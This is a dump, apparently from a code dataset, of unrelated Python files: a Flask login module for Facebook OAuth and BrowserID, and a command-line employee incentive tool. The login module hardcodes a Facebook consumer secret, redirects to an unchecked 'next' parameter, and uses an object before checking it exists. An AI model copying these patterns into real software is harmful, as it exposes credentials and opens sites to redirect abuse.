return render(request, 'jobs/quote3.html', {'form': form})
|
import json
import os
import urllib2,urllib
from flask import Module
from flask import redirect,request,session,url_for
from flask.ext.oauth import OAuth
from db import Database
from util import *
login = Module(__name__)
oauth = OAuth()
facebook = oauth.remote_app('facebook',
base_url='https://graph.facebook.com/',
request_token_url=None,
access_token_url='/oauth/access_token',
authorize_url='https://www.facebook.com/dialog/oauth',
consumer_key="178485798938752",
consumer_secret="3fc3c9f171bbb5221403307113662fe5",
request_token_params={'scope': 'email,user_likes,friends_likes,user_location'}
)
def cookieUser(email,extra_data=None):
if extra_data is None:
extra_data = dict()
userObjData = {
'email': email
}
userObjData.update(extra_data)
def saveAndSet(_userObj):
Database.users.save(_userObj)
_userObj['_id'] = str(_userObj['_id'])
session['userObj'] = _userObj
# TODO: Find out why session['userObj'] sometimes persists after logout
# if session.get('userObj'):
# print "session.get('userObj'):"
# userObjData.update(session['userObj'])
# saveAndSet(userObjData)
# #Database.createUserObj(email=email,voterID=session['userObj'].get('voter_uniqueid'),extra_data=extra_data)
# else:
# Look for existing userObjs for this e-mail or a user's voterID
emailUserObj = Database.getUserByEmail(email)
voterIDUserObj = Database.getUserByVoterID(session['voterID']) if session.get('voterID') else None
emailUserObj['_id'] = str(emailUserObj['_id'])
if voterIDUserObj:
if emailUserObj:
if emailUserObj.get('voter_uniqueid'):
session['userObj'] = emailUserObj
else:
emailUserObj['voter_uniqueid'] = session['voterID']
saveAndSet(emailUserObj)
else:
voterIDUserObj['email'] = email
saveAndSet(voterIDUserObj)
elif emailUserObj:
if not(emailUserObj.get('voter_uniqueid')) and session.get('voterID'):
emailUserObj['voter_uniqueid'] = session.get('voterID')
saveAndSet(emailUserObj)
else:
session['userObj'] = emailUserObj
else:
session['userObj'] = Database.createUserObj(voterID=session.get('voterID'),email=email,extra_data=extra_data)
@login.route('/login/facebook/')
def handle_facebook():
return facebook.authorize(callback=url_for('facebook_authorized',
next=request.args.get('next') or request.referrer or None,
_external=True))
@login.route('/login/facebook_authorized/')
@facebook.authorized_handler
def facebook_authorized(resp):
if resp is None:
return 'Access denied: reason=%s error=%s' % (
request.args['error_reason'],
request.args['error_description']
)
session['oauth_token'] = (resp['access_token'], '')
me = facebook.get('/me')
if me.data.get('error'):
return 'Could not call Facebook.'
userObjData = {
'name': me.data['name'],
'email': me.data['email'],
'source': 'facebook',
'facebook_id': me.data['id']
}
cookieUser(me.data['email'],userObjData)
# if session.get('voterID'): associateEmailWithVoterID(me.data['email'],session.get('voterID'))
return redirect(request.args.get('next') or '/')
@login.route("/login/browserid/",methods=['POST'])
def handle_browserid():
data = {
"assertion" : request.form.get('assertion'),
"audience" : urllib2.Request(request.url).get_host()
}
nextURL = request.args.get('next') or '/'
req = urllib2.Request('https://browserid.org/verify',urllib.urlencode(data))
json_result = urllib2.urlopen(req).read()
# Parse the JSON to extract the e-mail
result = json.loads(json_result)
if result.get('status') == 'failure':
return jsonifyResponse({
'success': False,
'error': True,
'error_description': 'BrowserID assertion check failed!'
})
userObjData = {
'source': 'browserid',
}
cookieUser(result.get('email'),userObjData)
# if session.get('voterID'): associateEmailWithVoterID(result.get('email'),session.get('voterID'))
# upsertUser(result.get('email'))
return jsonifyResponse({
'success': True,
'next': nextURL
})
@facebook.tokengetter
def get_facebook_oauth_token():
return session.get('oauth_token')
@login.route("/login/")
def signin():
if getLoggedInUser() is not None:
return redirect("/")
fbLoginLink = url_for('login.handle_facebook',next=request.args.get('next') or '/')
browserIDLoginLink = url_for('login.handle_browserid',next=request.args.get('next') or '/')
return auto_template('login.html',fb_login_link=fbLoginLink,browserid_login_link=browserIDLoginLink)
@login.route("/logout/")
def logout():
if session.get('userObj'):
del session['userObj']
if session.get('voterID'):
del session['voterID']
session.modified = True
return redirect(request.args.get('next') or '/')
|
from db import dataBase as database
class incentive:
def __init__(self):
self.incentiveId = ""
self.incentiveAmount = ""
self.incentiveDate = ""
self.employeeId = ""
self.employeeSalary = 0
def selectAllIncentive(self,cursor):
try:
days = int(input("Show data upto how many previous days?"))
cursor.execute('SELECT * FROM dbo.Incentive where incentive_date <=CONVERT (date, GETDATE()) and incentive_date>CONVERT (date, GETDATE()-?)',days)
dash = '-' * 100
data = cursor.fetchall()
if len(data) != 0:
print(dash)
print('{:<5s}{:>30s}{:>30s}{:>30s}'.format("Id", "Incentive Amount", "Date", "Employee Id"))
print(dash)
for row in data:
print('{:<5s}{:>30s}{:>30s}{:>30s}'.format(str(row[0]), str(row[1]), row[2], row[3]))
else:
print("No incentive record present for last %i days"%days)
except:
print("Something went wrong.!! Contact the administrator.!")
def selectBasedOnName(self, cursor):
try:
name = input("Enter name of employee. !")
args = ['%' + name + '%']
cursor.execute('SELECT * FROM dbo.Employee where employee_name like ?', args)
dash = '-' * 180
data = cursor.fetchall()
if len(data) != 0:
print(dash)
print('{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format("Id", "Name", "Designation", "DOB", "PPS",
"Salary"))
print(dash)
for row in data:
print(
'{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format(str(row[0]), row[1], row[2], row[4], row[5],str(row[6])))
empid=input("Enter employee id from above.!")
cursor.execute("SELECT * FROM dbo.Incentive where employee_id=?", empid)
data = cursor.fetchall()
if len(data) != 0:
print(dash)
print('{:<5s}{:>30s}{:>30s}{:>30s}'.format("Id", "Incentive Amount", "Date", "Employee Id"))
print(dash)
for row1 in data:
print('{:<5s}{:>30s}{:>30s}{:>30s}'.format(str(row1[0]), str(row1[1]), row1[2], row1[3]))
else:
print("No incentive found for the employee")
else:
print("No employee found with that name.!")
except:
print ("Something went wrong.!! Contact the administrator.!")
def addIncentive(self, cursor):
try:
name = input("Enter name of employee. !")
args = ['%' + name + '%']
cursor.execute('SELECT * FROM dbo.Employee where employee_name like ?', args)
dash = '-' * 180
data = cursor.fetchall()
if len(data) != 0:
print(dash)
print('{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format("Id", "Name", "Designation", "DOB", "PPS",
"Salary"))
print(dash)
for row in data:
print(
'{:<5s}{:>30s}{:>30s}{:>30s}{:>30s}{:>30s}'.format(str(row[0]), row[1], row[2], row[4], row[5], str(row[6])))
empid = input("Enter employee id from above.!")
db = database()
incentive_date = input("Enter incentive date")
db.insertIncentive(empid,incentive_date)
else:
print("No employee found with that name.!")
except:
print ("Something went wrong.!! Contact the administrator.!")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.